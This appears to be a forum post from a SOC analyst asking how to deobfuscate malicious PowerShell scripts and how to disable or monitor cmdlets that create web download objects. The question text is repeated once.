Hi guys,
As part of my SOC Analyst role I often come across malicious PS scripts.
I often have to try to deobfuscate them before I can try to work out what they're doing which is one of the questions I want to ask.
Once I have deobfuscated them enough to get a feel for what they're doing, they almost always create a new browsing object to download a malicious payload.
So I have a couple of questions I'd like to pose tot he group:
1. Is there any easy way to get scripts deobfuscated?
The machine obviously needs to deobfuscate them to know which cmdlets to invoke with which parameters etc.
2. Is there any way to "disable" or monitor specific cmdlets?
Particularly the ones that create new web objects?
Thanks in advance.
As part of my SOC Analyst role I often come across malicious PS scripts.
I often have to try to deobfuscate them before I can try to work out what they're doing which is one of the questions I want to ask.
Once I have deobfuscated them enough to get a feel for what they're doing, they almost always create a new browsing object to download a malicious payload.
So I have a couple of questions I'd like to pose tot he group:
1. Is there any easy way to get scripts deobfuscated?
The machine obviously needs to deobfuscate them to know which cmdlets to invoke with which parameters etc.
2. Is there any way to "disable" or monitor specific cmdlets?
Particularly the ones that create new web objects?
Thanks in advance.